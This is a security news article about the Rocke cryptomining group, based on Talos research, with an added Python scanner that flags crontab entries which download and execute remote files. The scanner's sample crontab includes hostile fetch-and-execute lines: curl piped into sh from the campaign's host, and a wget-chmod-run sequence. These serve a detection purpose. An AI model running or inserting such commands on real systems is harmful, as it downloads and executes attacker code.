Despite market volatility, Cisco Talos researchers have noticed falling cryptocurrency prices have had little to no effect on cryptomining malware campaigns.
Researchers are warning users of a Chinese-language threat actor named Rocke who has been leveraging Git repositories to infect systems with Monero-mining malware, according to a 30 August blog post.
Rocke has been on their radar since April 2018, when the group began leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability. Most recently, researchers have spotted the same threat actor running a similar campaign, which gave them more insight into Rocke's methods.
"Once the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file 'logo.jpg' from '3389[.]space'," researchers said in the post.
"This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename 'java.' The exact file downloaded depends on the victim's system architecture. Similarly, the system architecture determines if 'h32' or 'h64' is used to invoke 'java.'"
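The persistence mechanism quoted above, a cron job that fetches a remote file and hands it to a shell, has a recognisable shape that a defender can look for in crontabs. The script below is an added example written for this article; it is not Talos code and reproduces nothing from the campaign itself. It parses crontab-style lines, strips the schedule, and flags commands that download remote content with curl or wget and then execute it (piping into a shell, or running or chmod-ing the fetched file). The sample crontab is constructed: the host and filename in the second entry are the ones the article names, the third entry uses a documentation IP address, and the other entries are benign jobs included to show they are not flagged.

```python
"""Flag crontab entries with a fetch-and-execute shape (added example, not Talos code)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Indicators of the pattern: a downloader, then execution of what it fetched.
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|da|z)?sh\b")
RUN_AFTER_FETCH = re.compile(r"(?:;|&&)\s*(?:(?:ba)?sh\s+\S+|chmod\s+\+x|/tmp/\S+|\./\S+)")
IMAGE_URL = re.compile(r"https?://\S+\.(?:jpe?g|png|gif)\b", re.I)   # "logo.jpg" that is really a script
TMP_WRITE = re.compile(r"-[oO]\s+(?:/tmp/|/dev/shm/|/var/tmp/)")
URL_HOST = re.compile(r"(?:https?|ftp)://([a-z0-9.-]+)", re.I)

# Constructed sample crontab, not a real capture. The host and file name in the
# second entry come from the article; 203.0.113.10 is a documentation address.
SAMPLE_CRONTAB = """\
PATH=/usr/local/bin:/usr/bin:/bin
0 2 * * * /usr/bin/apt-get update -q
*/10 * * * * curl -fsSL http://3389[.]space/logo.jpg | sh
@reboot wget -q -O /tmp/.x http://203.0.113.10/bin; chmod +x /tmp/.x; /tmp/.x
30 4 * * 0 /usr/local/bin/backup.sh --full
"""


@dataclass
class Finding:
    command: str
    flagged: bool
    reasons: List[str] = field(default_factory=list)
    hosts: List[str] = field(default_factory=list)


def command_of(line: str) -> Optional[str]:
    """Return the command part of a crontab line, or None for comments/variables."""
    s = line.strip()
    if not s or s.startswith("#"):
        return None
    first = s.split(None, 1)[0]
    if "=" in first:             # environment assignment such as PATH=...
        return None
    if first.startswith("@"):    # @reboot, @daily, ...
        parts = s.split(None, 1)
        return parts[1] if len(parts) == 2 else None
    parts = s.split(None, 5)     # five schedule fields, then the command
    return parts[5] if len(parts) == 6 else None


def inspect_command(cmd: str) -> Finding:
    """Score one command; only a download combined with execution is flagged."""
    norm = cmd.replace("[.]", ".")   # accept defanged hosts as they appear in reports
    reasons: List[str] = []
    fetch = DOWNLOADER.search(norm)
    if fetch:
        reasons.append(f"fetches remote content with {fetch.group(1)}")
    if PIPE_TO_SHELL.search(norm):
        reasons.append("pipes fetched content straight into a shell")
    if RUN_AFTER_FETCH.search(norm):
        reasons.append("executes a file right after fetching it")
    if IMAGE_URL.search(norm):
        reasons.append("fetched URL is disguised with an image extension")
    if TMP_WRITE.search(norm):
        reasons.append("writes the download to a world-writable temp directory")
    executes = bool(PIPE_TO_SHELL.search(norm) or RUN_AFTER_FETCH.search(norm))
    hosts = sorted(set(URL_HOST.findall(norm)))
    # A plain download may be a legitimate updater; require fetch AND execute.
    return Finding(cmd, fetch is not None and executes, reasons, hosts)


def scan_crontab(text: str) -> List[Finding]:
    """Return findings for every flagged entry in a crontab dump."""
    findings = []
    for line in text.splitlines():
        cmd = command_of(line)
        if cmd is None:
            continue
        f = inspect_command(cmd)
        if f.flagged:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"FLAGGED: {f.command}")
        print(f"  hosts: {', '.join(f.hosts) or '-'}")
        for r in f.reasons:
            print(f"  - {r}")
```

Feed it the output of `crontab -l` for each user plus `/etc/crontab` and the `/etc/cron.d` files; the extracted hosts are the values worth comparing against threat intelligence, and the image-extension reason is the tell for the "logo.jpg" trick in particular.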
The miner's payload appears to be similar to the one used by the Iron Cybercrime Group as they both behave similarly and reach out to similar infrastructure, researchers noted.
Rocke has also been spotted attempting to access cloud storage services and manuals for programming in Chinese Easy Language. Researchers suspect Rocke will continue to leverage Git repositories to download and execute illicit mining software on victim machines, and will also likely adopt social engineering as a new infection vector.